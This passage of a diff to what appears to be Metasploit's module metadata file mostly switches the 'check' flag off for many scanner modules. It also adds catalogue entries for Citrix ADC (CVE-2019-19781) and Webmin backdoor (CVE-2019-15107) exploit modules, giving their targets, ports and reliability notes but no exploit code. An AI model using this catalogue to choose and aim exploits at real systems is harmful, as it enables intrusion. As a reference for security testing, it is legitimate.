    "is_install_path": true,
    "ref_name": "scanner/smb/smb2",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40015,7 +40161,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enum_gpp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40058,7 +40204,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40097,7 +40243,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40137,7 +40283,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40179,7 +40325,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -40218,7 +40364,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40267,7 +40413,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_ms17_010",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40355,7 +40501,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40401,7 +40547,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40444,7 +40590,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_ntlm_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40489,7 +40635,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40532,7 +40678,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40570,7 +40716,7 @@
    "path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/aix_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40608,7 +40754,7 @@
    "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/arris_dg950",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40645,7 +40791,7 @@
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40683,7 +40829,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_config_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40721,7 +40867,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40759,7 +40905,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40798,7 +40944,7 @@
    "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/epmp1000_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40835,7 +40981,7 @@
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40874,7 +41020,7 @@
    "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/sbg6580_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40913,7 +41059,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40954,7 +41100,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40991,7 +41137,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41028,7 +41174,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41065,7 +41211,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41104,7 +41250,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_set",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41141,7 +41287,7 @@
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41178,7 +41324,7 @@
    "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/xerox_workcentre_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41215,7 +41361,7 @@
    "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/apache_karaf_command_execution",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -41254,7 +41400,7 @@
    "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/cerberus_sftp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41292,7 +41438,7 @@
    "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/detect_kippo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41332,7 +41478,7 @@
    "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/eaton_xpert_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41374,7 +41520,7 @@
    "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/fortinet_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41414,7 +41560,7 @@
    "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/juniper_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41455,7 +41601,7 @@
    "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/karaf_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41494,7 +41640,7 @@
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41531,7 +41677,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_enum_git_keys",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41579,7 +41725,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41618,7 +41764,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_identify_pubkeys",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41655,7 +41801,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41693,7 +41839,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41730,7 +41876,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41783,7 +41929,7 @@
    "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
    "is_install_path": true,
    "ref_name": "scanner/ssl/bleichenbacher_oracle",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41830,7 +41976,7 @@
    "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/openssl_ccs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41926,7 +42072,7 @@
    "path": "/modules/auxiliary/scanner/steam/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/steam/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41963,7 +42109,7 @@
    "path": "/modules/auxiliary/scanner/telephony/wardial.rb",
    "is_install_path": true,
    "ref_name": "scanner/telephony/wardial",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42000,7 +42146,7 @@
    "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/brocade_enable_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42037,7 +42183,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_password",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42075,7 +42221,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42114,7 +42260,7 @@
    "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/satel_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42155,7 +42301,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_encrypt_overflow",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42192,7 +42338,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42232,7 +42378,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_ruggedcom",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42269,7 +42415,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42303,11 +42449,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
    "is_install_path": true,
    "ref_name": "scanner/teradata/teradata_odbc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42353,7 +42499,7 @@
    "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42393,7 +42539,7 @@
    "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/netdecision_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42430,7 +42576,7 @@
    "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/tftpbrute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42469,7 +42615,7 @@
    "path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/ubiquiti/ubiquiti_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42507,7 +42653,7 @@
    "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
    "is_install_path": true,
    "ref_name": "scanner/udp/udp_amplification",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42545,7 +42691,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42586,7 +42732,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_msearch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42627,7 +42773,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42668,7 +42814,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42714,7 +42860,7 @@
    "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/esx_fingerprint",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42751,7 +42897,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42789,7 +42935,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42835,7 +42981,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_permissions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42881,7 +43027,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_sessions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42927,7 +43073,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_users",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42973,7 +43119,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_vms",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -43019,7 +43165,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_host_details",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -43065,7 +43211,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43111,7 +43257,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_screenshot_stealer",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -43161,7 +43307,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_server_dir_trav",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43211,7 +43357,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_update_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43249,7 +43395,7 @@
    "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/ard_root_pw",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43297,7 +43443,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43337,7 +43483,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_none_auth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43415,7 +43561,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/urgent11_check.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/urgent11_check",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43456,7 +43602,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_bootline",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43494,7 +43640,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43543,7 +43689,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_auth_methods",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43592,7 +43738,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43641,7 +43787,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43690,7 +43836,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_wql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43730,7 +43876,7 @@
    "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
    "is_install_path": true,
    "ref_name": "scanner/wproxy/att_open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43775,7 +43921,7 @@
    "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/wsdd/wsdd_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43813,7 +43959,7 @@
    "path": "/modules/auxiliary/scanner/x11/open_x11.rb",
    "is_install_path": true,
    "ref_name": "scanner/x11/open_x11",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46719,7 +46865,7 @@
    "path": "/modules/auxiliary/voip/asterisk_login.rb",
    "is_install_path": true,
    "ref_name": "voip/asterisk_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -46850,7 +46996,7 @@
    "path": "/modules/auxiliary/voip/sip_deregister.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_deregister",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46888,7 +47034,7 @@
    "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_invite_spoof",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -49788,7 +49934,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2018-11-22 23:10:57 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -51806,6 +51952,80 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/citrix_dir_traversal_rce": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal RCE",
+    "fullname": "exploit/linux/http/citrix_dir_traversal_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-17",
+    "type": "exploit",
+    "author": [
+      "Project Zero India",
+      "TrustedSec",
+      "James Brytan",
+      "James Smith",
+      "Marisa Mack",
+      "Rob Vinson",
+      "Sergey Pashevkin",
+      "Steven Laura",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.",
+    "references": [
+      "CVE-2019-19781",
+      "EDB-47901",
+      "EDB-47902",
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python",
+      "Unix Command"
+    ],
+    "mod_time": "2020-01-14 10:46:04 +0000",
+    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/citrix_dir_traversal_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -56787,11 +57007,11 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-11-12 02:17:58 +0000",
+    "mod_time": "2019-12-03 10:39:58 +0000",
    "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pulse_secure_cmd_exec",
-    "check": false,
+    "check": true,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -58730,6 +58950,70 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/webmin_backdoor": {
+    "name": "Webmin password_change.cgi Backdoor",
+    "fullname": "exploit/linux/http/webmin_backdoor",
+    "aliases": [
+      "exploit/unix/webapp/webmin_backdoor"
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-10",
+    "type": "exploit",
+    "author": [
+      "AkkuS",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
+    "references": [
+      "CVE-2019-15107",
+      "URL-http://www.webmin.com/exploit.html",
+      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
+      "URL-https://blog.firosolutions.com/exploits/webmin/",
+      "URL-https://github.com/webmin/webmin/issues/947"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2020-01-16 14:46:00 +0000",
+    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_backdoor",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
